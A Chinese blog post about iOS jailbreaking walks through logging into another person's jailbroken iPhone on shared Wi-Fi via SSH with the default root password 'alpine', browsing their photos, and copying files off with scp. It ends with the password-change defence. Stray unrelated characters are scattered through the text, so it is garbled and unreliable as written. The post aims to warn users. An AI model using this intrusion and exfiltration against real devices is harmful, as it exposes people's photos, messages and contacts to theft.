就在前幾天委可,國內(nèi)大神級越獄團隊盤古聯(lián)合PP助手發(fā)布了iOS9.2~9.3的越獄工具渊跋,由于工作原因腊嗡,我也在第一時間體驗了iOS9.3.3的越獄着倾,那到底什么是越獄呢?越獄燕少,其實就是利用iOS系統(tǒng)的漏洞來獲取設(shè)備的root權(quán)限卡者。那越獄之后的設(shè)備有什么不同呢?個人覺得主要有兩個方面:
一. 越獄之后的設(shè)備會開放iOS完整的文件系統(tǒng)
通過iTools之類的軟件客们,我們可以查看未越獄設(shè)備開放的用戶文件系統(tǒng)(路徑:/var/mobile/Media)崇决,如下圖
在這個文件系統(tǒng)中,我們能夠獲取到的只有照片底挫、視頻恒傻、iTunes音樂、電子書等等文件建邓,而越獄之后則會開放完整的iOS文件系統(tǒng)盈厘,如下圖:
可以說越獄之后,整個iOS系統(tǒng)的所有文件包括系統(tǒng)文件和用戶文件都暴露在我們面前了官边,我們可以進行任意的讀寫操作
二.? 越獄設(shè)備可以繞過蘋果的證書校驗沸手,安裝其他途徑的軟件和插件
未越獄設(shè)備安裝軟件有三個途徑:1. AppStore外遇,AppStore上面的軟件都是經(jīng)過蘋果審核和簽名認證的,基本上不會有危害用戶的行為? 2.用蘋果企業(yè)開發(fā)者證書打包的App可以通過瀏覽器直接安裝在iPhone上契吉,這種App就沒有經(jīng)過蘋果審核? 3. 作為開發(fā)者跳仿,可以利用Xcode直接將代碼運行在手機上進行真機測試? 上面三種途徑,都是需要經(jīng)過蘋果的證書校驗捐晶,將App安裝在固定的文件夾下菲语。而越獄設(shè)備在安裝了openssh(也是我們?nèi)肭衷姜z設(shè)備的工具)和AppSync兩個插件之后,就可以繞過蘋果的驗證惑灵,任意安裝其他途徑的軟件和插件谨究,實現(xiàn)一些未越獄設(shè)備不可能實現(xiàn)的功能,如更改壁紙泣棋、主題胶哲、通話短信增強、玩破解游戲等等潭辈。
說了這兩點鸯屿,看起來越獄設(shè)備要強大的多,但是不建議越獄把敢!不建議越獄寄摆!不建議越獄!用iPhone很大的原因是因為iOS系統(tǒng)運行流暢修赞,操作簡單婶恼,安全穩(wěn)定,如果想玩機柏副,那就用Android好了勾邦,可玩度要高的多。越獄之后的設(shè)備有很多缺點割择,系統(tǒng)會變卡眷篇,軟件插件沖突,耗電量增加荔泳,放棄安全機制等等蕉饼,前幾年電子城的商販忽悠人越獄的說法是越獄之后可以免費下載軟件游戲,實際上越獄之后在AppStore上下載收費軟件還是需要收費玛歌,而且越獄市場Cydia上也有收費軟件昧港,App內(nèi)也會有內(nèi)購。
如果說設(shè)備一旦越獄支子,一定要做好相應(yīng)的防范措施创肥,第一件就是更改openssh的密碼,如果未修改,那么有心之人就能很輕易的遠程登錄你的設(shè)備瓤的,之后手機便無隱私可言休弃。接下來我們來看一下怎樣通過openssh入侵未修改密碼的越獄設(shè)備。
1. 首先要保證和目標設(shè)備處在同一個wifi下
通過局域網(wǎng)掃描軟件可以查看同一個wifi下的其他設(shè)備的IP圈膏,這里為了方便塔猾,我就在越獄設(shè)備上直接查看IP地址了(點擊設(shè)置 -> 無線局域網(wǎng) -> 連接的wifi熱點),記錄下IP稽坤,我這里是192.168.3.6
2. 通過終端遠程登錄越獄設(shè)備
mac下可以直接使用終端來進行操作丈甸,windows下可以用Putty等,大同小異尿褪,這里就以mac為例睦擂。打開終端,通過openssh連接遠程設(shè)備
依次輸入上圖標出的幾條命令:
1. 輸入ssh root@192.168.3.6并回車? ? 連接同一wifi下IP地址為192.168.3.6的主機
2. 提示之前未建立過連接杖玲,詢問是否連接(下次登錄就沒有這個提示了)輸入 yes 并回車
3. 接下就是輸入密碼了顿仇,越獄開啟openssh服務(wù)后root賬戶的密碼默認是alpine,此處我們輸入 alpine 并回車摆马,輸入密碼時是沒有任何字符或者長度的顯示的臼闻,直接輸完回車就好。(如果目標設(shè)備修改過密碼囤采,這里我們就登錄不上了)
4. 登錄成功之后再輸入 pwd回車可以查看當前目錄述呐,默認在/var/root
現(xiàn)在以root賬戶登錄成功,之后我們就可以通過相應(yīng)的命令讓設(shè)備關(guān)機重啟蕉毯、刪除系統(tǒng)文件乓搬、查看任意文件,就像在自己的設(shè)備上操作一樣代虾。接下來我們查看該設(shè)備中的照片进肯,還記得開始說的未越獄設(shè)備開放的用戶文件系統(tǒng)的路徑嗎?/var/mobile/Media褐着,手機中的照片就在這個路徑下
切換到照片文件夾的目錄下? cd /var/mobile/Media/DCIM/100APPLE/ 回車
ls回車? 列出此目錄下的所有文件
此時我們可以看到該文件夾中的照片了(測試設(shè)備上只有幾張截圖)坷澡,現(xiàn)在我們是通過終端查找到照片,無法直接查看含蓉,接下來還需要將照片發(fā)送到電腦上進行查看。(此處我是將mac也當成了一個遠程設(shè)備進行文件的拷貝项郊,如果有更好的方法可以留言)
scp -r IMG_0008.PNG liuhaiyang@192.168.3.7: ? ? 利用scp指令將IMG_0008.PNG文件拷貝到IP地址為192.168.3.7(電腦的IP地址)的主機的liuhaiyang(電腦當前登錄的賬戶)中
此時提示Connection refused馅扣,連接被拒絕了,因為mac默認是拒絕遠程登錄的着降,需要先設(shè)置一下
設(shè)置完畢之后差油,再次運行此命令
輸入 scp -r IMG_0008.PNG liuhaiyang@192.168.3.7: 并回車,提示輸入密碼,即電腦當前登錄賬戶的密碼蓄喇,回車之后開始利用wifi網(wǎng)絡(luò)進行文件的拷貝
然后我們就可以在mac中看到拷貝過來的文件了
ok发侵,至此,我們就利用openssh入侵了同個wifi下的越獄設(shè)備妆偏,這里我只是簡單拷貝了一張照片刃鳄,可以設(shè)想,在一些公共場合的wifi環(huán)境下钱骂,若是有人通過這種手段叔锐,不僅僅可以獲取照片視頻什么的,還能獲取你的聯(lián)系人见秽、短信愉烙、通話記錄、郵件等等解取,甚至微信沙盒中的聊天記錄步责。。禀苦。
那么如何防止越獄設(shè)備被入侵呢勺择?一. 不安裝openssh,這樣的話無法安裝未經(jīng)Apple簽名認證的App ?二. ?修改openssh的密碼伦忠,盡量設(shè)置一個復(fù)雜的密碼防止暴力破解省核。上面我只說了root賬戶,實際上有兩個賬戶昆码,一個是root賬戶气忠,一個是mobile賬戶,mobile賬戶的權(quán)限只在用戶文件系統(tǒng)下赋咽,這兩個賬戶的密碼都是需要修改的旧噪。至于怎么修改,非常簡單脓匿,百度一下有的是淘钟,今天太晚就不寫了,明天再更新吧
補充修改密碼的方法:
首先還是一樣登錄越獄設(shè)備陪毡,如果未修改密碼米母,默認是alpine,登錄成功后輸入 ?passwd 修改密碼毡琉,接下來需要我們輸入兩遍新密碼铁瞒,同樣還是沒有任何提示,輸完直接回車就行
之后我們可以重新登錄試試密碼修改成功沒有
輸入login進行登錄桅滋,之后輸入要登錄的賬戶慧耍,這里我們要登錄root賬戶身辨,所以輸入 root,然后再輸入新密碼芍碧,則可以登錄成功煌珊,至此root賬戶的密碼修改完畢
除了root賬戶外,還有一個mobile賬戶也是需要我們修改的泌豆。以默認密碼 alpine 登錄mobile賬戶定庵,然后以相同的辦法修改密碼,只不過將root換成mobile就可以了
以上純屬個人觀點践美,若有不當之處敬請指正